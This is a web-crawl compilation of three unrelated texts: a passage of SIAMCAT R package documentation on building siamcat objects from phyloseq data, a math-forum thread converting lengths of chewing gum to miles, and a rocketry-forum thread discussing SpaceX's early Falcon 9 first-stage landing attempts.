metagenomeSeq is an R package to determine differentially abundant features between multiple samples. There are two ways to input data into metagenomeSeq: 1. two files, one for metadata and one for features - those can be used in SIAMCAT just like described in SIAMCAT input with read.table: fn.in.feat <- system.file( "extdata", "CHK_NAME.otus.count.csv", package = "metagenomeSeq" ) stringsAsFactors = FALSE, check.names = FALSE ) 1. BIOM format file, that can be used in SIAMCAT as described in the following section ## BIOM format files The BIOM format files can be added to SIAMCAT via phyloseq. First the file should be imported using the phyloseq function import_biom. Then a phyloseq object can be imported as a siamcat object as descibed in the next section. ## Creating a siamcat object of a phyloseq object The siamcat object extends on the phyloseq object. Therefore, creating a siamcat object from a phyloseq object is really straightforward. This can be done with the siamcat constructor function. First, however, we need to create a label object: data("GlobalPatterns") ## phyloseq example data label <- create.label(meta=sample_data(GlobalPatterns), label = "SampleType", case = c("Freshwater", "Freshwater (creek)", "Ocean")) ## Label used as case: ## Freshwater,Freshwater (creek),Ocean ## Label used as control: ## rest ## + finished create.label.from.metadata in 0.004 s # run the constructor function siamcat <- siamcat(phyloseq=GlobalPatterns, label=label) ## + starting validate.data ## +++ checking overlap between labels and features ## + Keeping labels of 26 sample(s). ## +++ checking sample number per class ## Data set has a limited number of training examples: ## rest 18 ## Case 8 ## Note that a dataset this small/skewed is not necessarily suitable for analysis in this pipeline. ## +++ checking overlap between samples and metadata ## + finished validate.data in 0.108 s # Creating a siamcat-class object The siamcat-class is the centerpiece of the package. All of the is stored inside of the object: In the figure above, rectangles depict slots of the object and the class of the object stored in the slot is given in the ovals. There are two obligatory slots -phyloseq (containing the metadata as sample_data and the original features as otu_table) and label - marked with thick borders. The siamcat object is constructed using the siamcat() function. There are two ways to initialize it: • Features: You can provide a feature matrix, data.frame, or otu_table to the function (together with label and metadata information): siamcat <- siamcat(feat=feat, label=label, meta=meta) • phyloseq: The alternative is to create a siamcat object directly out of a phyloseq object: siamcat <- siamcat(phyloseq=phyloseq, label=label) Please note that you have to provide either feat or phyloseq and that you cannot provide both. In order to explain the siamcat object better we will show how each of the slots is filled. ## phyloseq, label and orig_feat slots The phyloseq and label slots are obligatory. • The phyloseq slot is an object of class phyloseq, which is described in the help file of the phyloseq class. Help can be accessed by typing into R console: help('phyloseq-class'). • The otu_table slot in phyloseq -see help('otu_table-class')- stores the original feature table. For SIAMCAT, this slot can be accessed by orig_feat. • The label slot contains a list. This list has a specific set of entries -see help('label-class')- that are automatically generated by the read.label or create.label functions. The phyloseq, label and orig_feat are filled when the siamcat object is first created with the constructor function. ## All the other slots Other slots are filled during the run of the SIAMCAT workflow: ## Accessing and assigning slots Each slot in siamcat can be accessed by typing slot_name(siamcat) e.g. for the eval_data slot you can types eval_data(siamcat) There is one notable exception: the phyloseq slot has to be accessed with physeq(siamcat) due to technical reasons. Slots will be filled during the SIAMCAT workflow by the package’s functions. However, if for any reason a slot needs to be assigned outside of the workflow, the following formula can be used: slot_name(siamcat) <- object_to_assign e.g. to assign a new_label object to the label slot: label(siamcat) <- new_label ## Slots inside the slots There are two slots that have slots inside of them. First, the model_list slot has a models slot that contains the actual list of mlr models -can be accessed via models(siamcat)- and model.type which is a character with the name of the method used to train the model: model_type(siamcat). The phyloseq slot has a complex structure. However, unless the phyloseq object is created outside of the SIAMCAT workflow, only two slots of phyloseq slot will be occupied: the otu_table slot containing the features table and the sam_data slot containing metadata information. Both can be accessed by typing either features(siamcat) or meta(siamcat). Additional slots inside the phyloseq slots do not have dedicated accessors, but can easily be reached once the phyloseq object is exported from the siamcat object: phyloseq <- physeq(siamcat) tax_tab <- tax_table(phyloseq) ## Taxonomy Table: [6 taxa by 7 taxonomic ranks]: ## Kingdom Phylum Class Order ## 549322 "Archaea" "Crenarchaeota" "Thermoprotei" NA ## 522457 "Archaea" "Crenarchaeota" "Thermoprotei" NA ## 951 "Archaea" "Crenarchaeota" "Thermoprotei" "Sulfolobales" ## 244423 "Archaea" "Crenarchaeota" "Sd-NA" NA ## 586076 "Archaea" "Crenarchaeota" "Sd-NA" NA ## 246140 "Archaea" "Crenarchaeota" "Sd-NA" NA ## Family Genus Species ## 549322 NA NA NA ## 522457 NA NA NA ## 951 "Sulfolobaceae" "Sulfolobus" "Sulfolobusacidocaldarius" ## 244423 NA NA NA ## 586076 NA NA NA ## 246140 NA NA NA If you want to find out more about the phyloseq data structure, head over to the phyloseq BioConductor page. # Session Info ## R version 3.6.3 (2020-02-29) ## Platform: x86_64-apple-darwin15.6.0 (64-bit) ## Running under: macOS Catalina 10.15.5 ## ## Matrix products: default ## BLAS: /Library/Frameworks/R.framework/Versions/3.6/Resources/lib/libRblas.0.dylib ## LAPACK: /Library/Frameworks/R.framework/Versions/3.6/Resources/lib/libRlapack.dylib ## ## locale: ## [1] en_US.UTF-8/en_US.UTF-8/en_US.UTF-8/C/en_US.UTF-8/en_US.UTF-8 ## ## attached base packages: ## [1] stats graphics grDevices utils datasets methods base ## ## other attached packages: ## [1] SIAMCAT_1.9.0 phyloseq_1.28.0 mlr_2.15.0 ParamHelpers_1.12 ## [5] BiocStyle_2.12.0 ## ## loaded via a namespace (and not attached): ## [1] Biobase_2.44.0 jsonlite_1.6 splines_3.6.3 ## [4] foreach_1.4.7 PRROC_1.3.1 LiblineaR_2.10-8 ## [7] assertthat_0.2.1 BiocManager_1.30.9 stats4_3.6.3 ## [10] progress_1.2.2 yaml_2.2.0 corrplot_0.84 ## [13] pillar_1.4.2 backports_1.1.5 lattice_0.20-38 ## [16] glue_1.3.1 pROC_1.15.3 digest_0.6.22 ## [19] RColorBrewer_1.1-2 XVector_0.24.0 checkmate_1.9.4 ## [22] colorspace_1.4-1 htmltools_0.4.0 Matrix_1.2-18 ## [25] plyr_1.8.4 pkgconfig_2.0.3 bookdown_0.14 ## [28] zlibbioc_1.30.0 purrr_0.3.3 scales_1.0.0 ## [31] parallelMap_1.4 tibble_2.1.3 beanplot_1.2 ## [34] mgcv_1.8-31 IRanges_2.18.3 ggplot2_3.2.1 ## [37] infotheo_1.2.0 BiocGenerics_0.30.0 lazyeval_0.2.2 ## [40] survival_3.1-8 magrittr_1.5 crayon_1.3.4 ## [43] memoise_1.1.0 evaluate_0.14 fs_1.3.1 ## [46] nlme_3.1-144 MASS_7.3-51.5 vegan_2.5-6 ## [49] prettyunits_1.0.2 tools_3.6.3 data.table_1.12.6 ## [52] hms_0.5.1 matrixStats_0.55.0 gridBase_0.4-7 ## [55] BBmisc_1.11 stringr_1.4.0 Rhdf5lib_1.6.3 ## [58] S4Vectors_0.22.1 glmnet_2.0-18 munsell_0.5.0
2020-10-20 11:23:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18606986105442047, "perplexity": 13742.028445548101}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107872686.18/warc/CC-MAIN-20201020105000-20201020135000-00366.warc.gz"}
http://mathhelpforum.com/math-topics/188035-chewing-gum-miles-print.html
# Chewing Gum and Miles ? • Sep 15th 2011, 05:58 AM Bluerain Chewing Gum and Miles ? Well I'm not sure if I have the correct answer myself so any help would be nice. How many miles would it be if I had 30 million sticks of gum ....each stick of gum is 3 and half inches long ? Thanks • Sep 15th 2011, 07:38 AM emakarov Re: Chewing Gum and Miles ? What answer did you get and how did you get it? • Sep 15th 2011, 08:38 AM Bluerain Re: Chewing Gum and Miles ? I just multiplied 30 mil by 3.5 which =105 million inches and knew there were 63, 360 inches in a mile and went from there by dividing 63,360 by 105 million. I'm sure there is a shorter way ..correct ? • Sep 15th 2011, 09:18 AM emakarov Re: Chewing Gum and Miles ? Quote: Originally Posted by Bluerain and went from there by dividing 63,360 by 105 million. The other way around. Quote: Originally Posted by Bluerain I'm sure there is a shorter way ..correct ? No, that's pretty much how it should be done. Quote: Originally Posted by Bluerain I agree, except that the last digit should be 7 due to rounding (since the following digit is 9 in my calculation). If the first thrown away digit is >= 5, the last remaining digit is increased by 1. • Sep 15th 2011, 09:24 AM e^(i*pi) Re: Chewing Gum and Miles ? Quote: Originally Posted by Bluerain I just multiplied 30 mil by 3.5 which =105 million inches and knew there were 63, 360 inches in a mile and went from there by dividing 63,360 by 105 million. I'm sure there is a shorter way ..correct ? For notation's sake I will write $105,000,000 = 1.05 \cdot 10^8$ $1.05 \times 10^8 \text{ in} \times \dfrac{1 \text{ ft}}{12 \text { inch}} \times \dfrac{1 \text{ yd}}{3 \text{ ft}} \times \dfrac{1 \text{ mi}}{1760 \text{ yd}}$ $1.05 \times 10^8 \times \dfrac{1}{12 \times 3 \times 1760} \text{ miles} = 1657 \text{ miles}$
2017-08-18 18:57:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7252790927886963, "perplexity": 3217.9546476585333}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886105086.81/warc/CC-MAIN-20170818175604-20170818195604-00204.warc.gz"}
https://www.rocketryforum.com/threads/spacex-falcon-9-historic-landing-thread-1st-landing-attempt-most-recent-missions.120975/
SpaceX Falcon 9 historic landing thread (1st landing attempt & most recent missions) Help Support The Rocketry Forum: georgegassaway NOTE - Thread is for the first landing attempt thru the most recent missions. This first post and thread title will no longer be updated with the most recent mission, but all are encouraged to make new posts for the newest (and future) missions. ------------------------------- Next launch is JCSAT-14, a Com Sat for Japan. very early Friday May 6th, 1:22 AM EDT (think of it more like launching late Thursday night after midnight). It will try to land on the ASDS Barge, OCISLY. News for this launch begins here: https://www.rocketryforum.com/showt...-PM-EDT-*TODAY*-April-8&p=1577374#post1577374 [archive milestone link to first successful ASDS Barge landing]CRS-8 , an ISS resupply mission, is currently set to launch Friday, April 8th, at 4:43 p.m. EDT. It’s booster is planned to land at sea, on the ASDS Barge “Of Course I Still Love You”. Link for thread message with more info on the flight is here: https://www.rocketryforum.com/showt...5-PM-EST-Friday-March-4&p=1568868#post1568868 [archive milestone link to first successful landing] The SpaceX RTF (Return To Flight) mission for Orbcomm-2 successfuly launched its satellites. The first stage soft landed on land, back at the Cape, at the new landing facility previously known as LC-13. See message #547: https://www.rocketryforum.com/showt...(Sunday)-at-8-29-PM-EST&p=1530659#post1530659 Here is the SpaceX Webcast link: https://www.spacex.com/webcast/ [original December 11, 2014 message text below] Space-X is scheduled to launch an unmanned "Dragon" spacecraft on a resupply mission to ISS. But the biggest news about that is that it will attempt the first landing of a Falcon-9 first stage, onto a solid surface, so it can not only be recovered intact but hopefully reflown. If successful it will make history. The computer-generated image below is not depicting pre-launch, it is post-landing! There have been successful tests of controlled re-entry and soft landings in the ocean (and MANY soft landing test hops in Texas). This time, it'll try to land on a converted barge. Here's a link to one of many stories about it, and some photos. I'm including the text of the story at the end of this. https://www.dailymail.co.uk/science...ugh-make-spaceflight-affordable-everyone.html BTW - here is a very relevant youtube video of a test flight in Texas in July. It flew a kilometer up, and tested out the deployable steered grid fins. However, it does not descend very fast, so the steerable grid fins did not really get much of a test like they will during supersonic descent from 20-30 thousand feet. The steering grid fins are pretty important for trying to make a precise landing on the barge. The earlier "soft landings" in the ocean were , as far as I can tell, not attempting to land on an exact coordinate spot and really could not do so without some kind of aerodynamic (or some other additional) steering to tweak the trajectory path during descent. And the test hops in Texas could not simulate a long ballistic descent because they did not have the necessary huge safety area to be able to fly that high, across a long distance, to attempt to simulate such a thing. It seems like the above test flight to a height of 1 kilometer might be the highest they have flown (and descended to simulate landing), and that was pretty much vertical. They have done other tests, not quite as high, where it flew partly diagonally then flew back to the launch pad. So the aerodynamic steering is to help get it close enough to the ballpark for the powered landing to be able take it the rest of the way. Here is a video of a launch in August, the second stage put six Orbcomm satellites into orbit. The first stage did a successful powered soft landing in the Atlantic Ocean, it floated for awhile but broke up & sank. Here is onboard video from the same flight. Unfortunately, the view was obscured by accumulations of ice, but you can still make out some neat portions of the landing. If it makes it close to the barge, there ought to be some great video, even if the onboard camera gets obscured again. I would expect a lot of fixed cameras on the barge. Perhaps a few that also pan and tilt, either remotely human controlled or auto-computer controlled. Also, they have made some great use of multicopters ("drones") for video of many of the Texas flights, despite the FAA anti-drone crusade. So I am hoping they also have at least one of those in the air, done well it would make for incredible video. Sort of depends I guess on how close the support ship will be, to allow for one or more human R/C pilots, and/or the range of the R/C equipment if the ship is say 10 miles out. Or if that is not practical, I would not be surprised if they had a totally autonomous multicopter or two to automatically shoot the video from fixed position(s) in the sky, a few hundred feet off to the side from the barge, with the camera pointed at the barge. Once the Falcon launches, it'll be minutes before the multicopter(s) would need to take off, and get into position. Onboard battery life not a big issue since they'll know when the Falcon first stage should land, almost to the second, so they can plan out the timeline to get into the air, into position, video the landing, and to allow for time to fly back to the barge, maybe do a not-too-close circle around Falcon, then land on the barge. The Public Relations value of such would be tremendous, because while aerospace pros and junkies do not even need to see any video to know the importance of it, the general public needs to see something impressive. And that would be the most impressive way to show it...... if it works (Hope they don't use the old cold war Russian method of only showing successes, put the video on a time delay and cut the feed if something goes wrong. They never did release any video of the self-destruct explosion they had in Texas, AFAIK. But then that was a private test, and not a NASA-funded launch). - George Gassaway Aerial view of the actual barge View of the deployable steerable "grid fins" at the top of the first stage, with interstage at right. Previous Falcon 9 launch in July. SpaceX gears up to land a reusable rocket on a floating barge - and the breakthrough could make spaceflight more affordable for everyone • SpaceX is planning to land a rocket at Cape Canaveral on Monday • The first stage of their Falcon 9 rocket will attempt to touch down on a barge after launching a Dragon capsule into space* • It is the first ever attempt at landing a rocket on solid ground after launch • Elon Musk said the ambitious attempt has a 50% chance of working • The company*ultimately*wants all of its rockets to be reusable* By JONATHAN O'CALLAGHAN FOR MAILONLINE SpaceX has long spoken of its ambition to make rockets reusable. And on Monday, the firm plans to reach a major milestone as part of this endeavour when it brings back part of one of its Falcon 9 rockets after launch.* If all goes to plan, the first stage of the rocket will gently lower itself and land on solid ground for the first time ever.* The attempt will occur during the launch of the latest cargo-carrying Dragon capsule to the ISS at 7.31pm GMT (2.31pm EST) on Monday 16 December. The Falcon 9 rocket carrying Dragon will take off from Florida’s Cape Canaveral Air Force Station. After launch, at a height of about 56 miles (90km), the first stage of the rocket will separate from the second stage. While the latter continues its mission into orbit, the former would usually be left to fall back into the ocean - as is the case on all other rocket launches. However on this flight, for the first time ever, SpaceX will instead use a specially designed first stage capable of landing itself on a floating barge. In a previous flight, a Falcon 9 first stage hovered above the surface of the ocean - without a barge - in a successful demonstration of the technology. On that flight, the first stage was left to fall into the ocean after proving it could hover above the ground. But on this next flight, the rocket will touch down on a floating barge. The barge measures about 300 feet (90 metres) long by 100 feet (30 metres) wide, and also has wings that extend out to another 170 feet (50 metres). According to SpaceX chief Elon Musk, it also has ‘thrusters repurposed from deep sea oil rigs’ that can hold it in position within 10 feet (three metres) even in a storm. To control the rocket as it lands, grid fins on its side are used, which control its pitch, yaw and roll. These are ‘stowed on ascent and then deploy on re-entry for “X-Wing” [from Star Wars] style control,’ according to Musk. And to slow it down as it descends it will save 15 per cent of its original fuel, allowing it to lower itself towards the ocean without the use of a parachute. However, as the mission has never been tried before, he added that there was only a 50 per cent chances of the platform landing being a success on this first attempt. Whatever the outcome, though, SpaceX will use the data they glean to improve their technique and one day plan to perform this manoeuvre during every launch. Cameras on board the barge will capture the entire descent, although it’s unclear how much - if any - of this footage SpaceX will make public. Eventually, they will start bringing the upper - or second - stage of the rocket back as well. The ultimate goal is to make the entire rocket reusable - which will drastically reduce the cost of going to space. SpaceX has a £1billion ($1.6 billion) contract with Nasa to resupply the ISS. This launch of the Dragon capsule will be the fifth of 12 scheduled missions. Last edited: georgegassaway Lifetime Supporter TRF Lifetime Supporter Here's a link to another article, with more technical info and background: SpaceX&#8217;s Autonomous Spaceport Drone Ship ready for action November 24, 2014 by Chris Bergin https://www.nasaspaceflight.com/2014/11/spacex-autonomous-spaceport-drone-ship/ The first stage leg-span is 60 feet, BTW. So if all four footpads are inside of the 80 foot yellow circle, that'll be pretty much a bulls-eye. The barge can keep station within 10 feet in high seas, so if Falcon landed 10 feet off.... it might not be Falcon that was off for all of the 10 feet, the barge might be off a few feet. Although I would expect the Falcon to be using some means of "homing in" for final corrections based on where the barge is exactly located as it is coming in to land, and not where the barge is supposed to be. Depending on what was technically more practical, possibly not "home" on the barge but for the barge to have GPS transponders that provide ultra-precise GPS coordinates for Falcon to get rapidly updated GPS data on where to exactly land. And here is a link with info on NASA TV's schedule for the launch. Set for December 16th at 2:31 EST https://www.nasa.gov/press/2014/dec...supply-mission-to-space-station/#.VIlODmTF8rM Unfortunately, the info on that page is 100% focused on the Dragon's payloads going to ISS. No mention of the planned landing of the first stage on the barge. That would be sort of like focusing on two payloads named John Young and Bob Crippen flying into orbit and returning safely in April 1981, without mentioning what history was made by the vehicle they launched in. I hope NASA does not ignore the landing attempt. I am not a NASA basher, but man that would be ridiculous if they overlook it, and/or Space-X does not make a live feed available. So it may well be that it'll be necessary to follow a live feed from Space-X to see what may be the most important part of this flight. Although I just looked at their site and do not see anything to support live feeds, only multimedia files. If NASA isn't going to do it, Space-X would be foolish not to have their own live feed of the landing. I'm going to check some other places for info on whether Space-X or NASA or someone is likely to have a live feed of the landing attempt. Just do not have a good feeling that an answer has not come up yet..... if it's planned it should be easier to find. - George Gassaway Last edited: fyrwrxz latest photo George- Thanks for taking the time for this extensive update. Your invaluable insights into the PR aspect of video feeds and the use of drones are dead on and I'm excited about the possibilities of seeing this evolve as a useful tool. I am not a "NASA basher" either (hell, they paid the bills in one form or another for 20 years) but I have my fingers crossed for SpaceX to prove we can do without the political pork barrels and infighting, budget restraints and 'non-engineering' inputs we suffered thru the latter half of our so called 'space program'. Myself, I see the Orion as so much static and noise destined to be heaped on the pile of dead ends that the politicos find so easy to discard for votes from the aging baby boomers when they want free hearing aids after decades of disco and heavy metal from their boom boxes. Clean signals and green lights to these guys! butalane Well-Known Member Cool post George! Its certainly going to be exciting! luke strawwalker Well-Known Member This certainly bears watching. I hope they have complete success and excellent coverage, especially from drones! Watching the parachute sequence and splashdown of Orion from their drone was VERY cool! I wonder why they didn't try to do a more 'long range ballistic arc' test at White Sands?? WSMR is a BIG place... not quite as big as they'd need for a full "100%" scale test of the path, altitude, and distance flown by a Falcon 9 stage 1, but for a grasshopper test article, they COULD have more closely approximated the kind of ballistic arc, descent, and landing that would be required of the larger Falcon 9 first stage, and remained within the WSMR safety zone, which is pretty huge... I guess perhaps working with the military or range fees or red tape or something is probably the reason they've simply kept testing to their own "test range" in central Texas. That, and just doing "on the side" flight testing as part of their contracted NASA launches under their COTS program contracts... very good use of "expended hardware" (which the first stage is after staging, anyway, at this point...) Later! OL JR georgegassaway Lifetime Supporter TRF Lifetime Supporter Well, I have not found any info on a live feed of the landing. I did ask on a space site where there ought to be answers.... but nobody had any solid info. Sadly a few came up with some petty excuses such as Space-X might not have a live feed in case it does not succeed, only release video much later if it works. So, Cold War Russian Space Program style. I hope not. I have very SLOWLY built up my impressions of Space-X. If they didn't show something this historic for petty reasons, they are not the company I thought they are and not worth that trust. But again it's fanboys who wrote some of those pre-emptive petty excuses. So they may be wrong and Space-X perhaps has not made info on how/where to see a feed of the landing in an easy-to-find way (yet?). But it's very troubling that if there is to be a live feed of the landing, it's this hard to get info on. I'm not as high on this as I was 24 hours ago. What does come thru clear is that NASA is "the customer", and the NASA TV feed is not going to cover anything beyond launching the spacecraft into orbit and getting supplies to ISS. Just another routine unmanned launch of supplies to ISS.......which if it was true most space buffs would not bother to watch to begin with. UPDATE - Launch has slipped to Dec 19th: https://spaceflightnow.com/2014/12/11/launch-of-spacex-cargo-mission-slips-to-dec-19/ - George Gassaway Last edited: jmattingly13 Well-Known Member I wonder why they didn't try to do a more 'long range ballistic arc' test at White Sands?? WSMR is a BIG place... not quite as big as they'd need for a full "100%" scale test of the path, altitude, and distance flown by a Falcon 9 stage 1, but for a grasshopper test article, they COULD have more closely approximated the kind of ballistic arc, descent, and landing that would be required of the larger Falcon 9 first stage, and remained within the WSMR safety zone, which is pretty huge... I guess perhaps working with the military or range fees or red tape or something is probably the reason they've simply kept testing to their own "test range" in central Texas. That, and just doing "on the side" flight testing as part of their contracted NASA launches under their COTS program contracts... very good use of "expended hardware" (which the first stage is after staging, anyway, at this point...) You know SpaceX has a lease with Spaceport America (right next to WSMR) for doing high altitude testing of Grasshopper/F9R? jmattingly13 Well-Known Member Well, I have not found any info on a live feed of the landing. I did ask on a space site where there ought to be answers.... but nobody had any solid info. Sadly a few came up with some petty excuses such as Space-X might not have a live feed in case it does not succeed, only release video much later if it works. So, Cold War Russian Space Program style. I hope not. I have very SLOWLY built up my impressions of Space-X. If they didn't show something this historic for petty reasons, they are not the company I thought they are and not worth that trust. But again it's fanboys who wrote some of those pre-emptive petty excuses. So they may be wrong and Space-X perhaps has not made info on how/where to see a feed of the landing in an easy-to-find way (yet?). But it's very troubling that if there is to be a live feed of the landing, it's this hard to get info on. I'm not as high on this as I was 24 hours ago. SpaceX has publicly stated that they are weaning themselves off holding a webcast for every launch, as they intend to make launches fairly regular and, for lack of better term, mundane. They pull engineers and managers off their normal jobs to do those webcasts, so the plan is only to do live webcasts of major milestone launches (Dragon v2, etc.). I would guess they might have a webcast for landing on a barge, but I cannot say for sure. If they do, it would be spacex.com/webcast. After all, their job is launching rockets, not broadcasting launches. georgegassaway Lifetime Supporter TRF Lifetime Supporter SpaceX has publicly stated that they are weaning themselves off holding a webcast for every launch, as they intend to make launches fairly regular and, for lack of better term, mundane. They pull engineers and managers off their normal jobs to do those webcasts, so the plan is only to do live webcasts of major milestone launches (Dragon v2, etc.). I would guess they might have a webcast for landing on a barge, but I cannot say for sure. If they do, it would be spacex.com/webcast. After all, their job is launching rockets, not broadcasting launches. Thanks very much for posting that link. You have done what nobody on nasaspaceflight.com was able to do. This will be the most historic flight Space-X has made, if the anding is a success. So even if they are weaninng off of webcasts, this is most deserving. And now that I see they have the previous ISS supply flight webcast up, it would make no sense to have posted that flight and not post this. Even a likely future launch of NASA astronauts to ISS won't be as fundamentally history-making as safely landing a re-useable rocket stage that helped launch a spacecraft into orbit. Of course that does not mean it will be a live video feed, but clearly that link is the place to "tune into" for the news about the landing attempt. - George Gassaway MichaelRapp Well-Known Member That camera view from the July test flight looked uncannily like a a keychain camera view from a model rocket. Well, except the absolutely no roll and that fact that the rocket stopped, then went back down. Ravenex Sponsor TRF Sponsor I'm confused about the grid fins. In a few threads I have seen it said that tube fins act as solid cylinders to supersonic flows, do grid fins not exhibit similar aerodynamics? Wingarcher Well-Known Member TRF Supporter How do they plan to recover the second stage, if the new clipping is accurate and they do want to do that... my understanding is the second stage ends up pretty close to orbital velocity which either introduces serious heating problems or uses massive amounts of fuel to slow waaaay down.... N jmattingly13 Well-Known Member How do they plan to recover the second stage, if the new clipping is accurate and they do want to do that... my understanding is the second stage ends up pretty close to orbital velocity which either introduces serious heating problems or uses massive amounts of fuel to slow waaaay down.... They're not trying to recover the second stage at this point. Elon's goal is to make everything recoverable if possible, but for the reasons you've stated, the second stage is not quite there yet. Peartree Cyborg Rocketeer Staff member Administrator Global Mod They're not trying to recover the second stage at this point. Elon's goal is to make everything recoverable if possible, but for the reasons you've stated, the second stage is not quite there yet. Also another reason why SpaceX might have wanted the "landing barge" thingy. While the first stage might be able, eventually when proven capable and safe, to fly back to the launch pad (or nearby), the second stage is going to be WAY downrange and flying back would seem to be highly unlikely. Igotnothing Well-Known Member Rocket beef! Who let the cows out? jmattingly13 Well-Known Member Also another reason why SpaceX might have wanted the "landing barge" thingy. While the first stage might be able, eventually when proven capable and safe, to fly back to the launch pad (or nearby), the second stage is going to be WAY downrange and flying back would seem to be highly unlikely. Interesting point. I hadn't thought of that. georgegassaway Lifetime Supporter TRF Lifetime Supporter I wrote this earlier but somehow it didn't get posted (probably in preview mode and didn't hit post). Fortunately the text was still in my "clipboard" when I saw it wasn't here. A wiki about grid fins: https://en.wikipedia.org/wiki/Grid_fin One thing I read recently was that added grid fins to Falcon because at supersonic speeds, the thrusters they used were not effective enough to steer it. And one of Elon Musk's tweets refers to them as "hypersonic" grid fins (Hypersonic means Mach 5+), and they will be deployed on re-entry. BTW - do take note that "re-entry' for the Falcon first stage is relatively mild and nowhere near the heating and stresses of a re-entry from orbital velocity. This is very relevant to some of the issues involved with a reuseable second stage, which the first stage does not have to deal with to those extremes. One bit of news i read as I googled for this, is an earlier failure to land safely was due to the RCS thrusters using so much fuel to try to steer it that they ran out of RCS fuel .That then left the Falcon unable to point itself the right way for gravity (well, technically, the relative G-force vector due to drag as it fell unpowered) to make the fuel to flow into the fuel lines so the engines could ignite. How do they plan to recover the second stage, if the new clipping is accurate and they do want to do that... my understanding is the second stage ends up pretty close to orbital velocity which either introduces serious heating problems or uses massive amounts of fuel to slow waaaay down.... Well, recovering the second stage is a goal for the future. Lots of problems to overcome before they will lbe able to try that. And indeed the 2nd stage will make it all the way into orbit. Suffice to say that the biggest cost for the rocket hardware is for the first stage, so recovering the first stage for re-use over and over will be a massive game-changer for the cost of space flight (it will remain to be seen how many times that the recovered stages and engines can be re-used before wearing out, and how much inspection and refurbishment they will need between flights). Recovering and re-using second stages will be the cherry on top, but nowhere near the financial impact of being able to reuse the first stage. Well, the second stage has 18.7% as much fuel and oxidizer as the first stage, and only one Merlin engine compared to nine Merlin engines for the first stage. Though it is a specialized vacuum version so it would tend to cost a bit more. So accounting for relative size of tankage needed and cost of engine, the second stage may cost around 1/6th the cost of the first stage. Or perhaps more like 1/5th. The cost per per stage might be out there in Google-land but it was not in the wiki so I'm not going to try digging any further, I think that 1/6 to 1/5 the cost of the first stage is a reasonable estimate in comparing the financial factors of reusing the first stage only versus also recovering and reusing the 2nd stage. Now that does not include the cost of lost parts like aerodynamic fairings. And some speculated schemes for a re-useable 2nd stage have involved structures that do not have a jettisoned fairing but instead the nose section stays with the 2nd stage for reentry, the stage would open up in some manner (sideways like a shuttle payload bay, or for the nose to be hinged to swing up) to let the payload (and a likely "kick" stage to reach higher orbits) come out then close back up for reentry. But the more involved it gets, the more that potential payload mass is lost in trading off for the mass of the reuseable 2nd stage. The cost of the guidance systems&#8230;.. both stages have guidance systems and such, Falcon-9 is not like the old Saturn-I B or Saturn-V with the guidance system all mounted into the Instrument Ring at the top of the uppermost stage (S-IVB stage). For some of the payloads, they need jettisoned fairings, such as for Dragon and other large satellites that are too big to go "inside" of a reusable second stage. So for payloads that need to sit on top of the second stage the second stage would need some other design approach. Among the problems of recovering the second stage: Stability-wise the heavy engines at back will make it want to re-enter tail-first. But the engines could not survive the intense re-entry heat. Any heat shield system based on nose-first re-entry will have to solve how to keep it pointed nose-first. A lifting body or stubby-winged design would do it, but a lot more mass for that so less payload mass delivered (of course, if the launch vehicle can put a LOT of payload into orbit, then the tradeoff of the payload mass lost for a heavy reuseable 2nd stage is better since most payloads would tend to be lighter than "a LOT"). The second stage not only will need to have the extra fuel (let's say 15%) to do a powered landing, it will also need some fuel to do the re-entry maneuvers. That will not only include the fuel to reduce orbital velocity to re-enter the atmosphere (which actually is not a whole lot from a low orbit, just enough to dip into the atmosphere correctly), but also some fuel to make a change in the orbital plane so it will come down the correct left-right path towards the landing spot. The shuttle did not have to do an orbital plane change burn because it used the wing lift and even had the cross-range ability to be able to land back at KSC after one orbit (Those banked "S" turns it did on re-entry, if they did a "C" turn instead in one direction it could have veered 1100 miles to the side of its orbital path). For a reuseable second stage, it will need to come back down within landing windows about 12 hours apart (if night and/or overflight of certain populated areas is not an issue), or 24 hours (if night and/or overflight of certain populated areas is an issue), due to the rotation of the Earth. The orbital timing won't tend to match exactly in 12 or 24 hour increments, unless the orbit was exactly 90 minutes in duration, so every minute before or after the optimum 12 hour increments will require more and more of an orbital change burn. It might even practical to raise or lower the obit slightly (shortly after payload release) to try to make the timing of the orbit match up closer to the 12/24 hour increment so as to minimize the fuel needed for an orbital plane change. Now, if the second stage had grid fins, it could make a tiny change in crossrange. But those grid fins could NOT be deployed during the worst part of reentry (they'd burn up), when the stage would need to make the best and most effective use of any aerodynamic maneuvering to affect the cross range. So, lots of things for them to work out before recovering and reusing second stages. Several years. And as I said, nowhere near the financial payoff to do that compared to reusing the first stage. So if the first stage cost say 40 million, the current expendable 2nd stage might cost about 6.7 to 8 million. Which is nothing to sneeze at, but not a lot compared to$40 million for the first stage and a 2nd stage that is not hobbled by the extra mass added 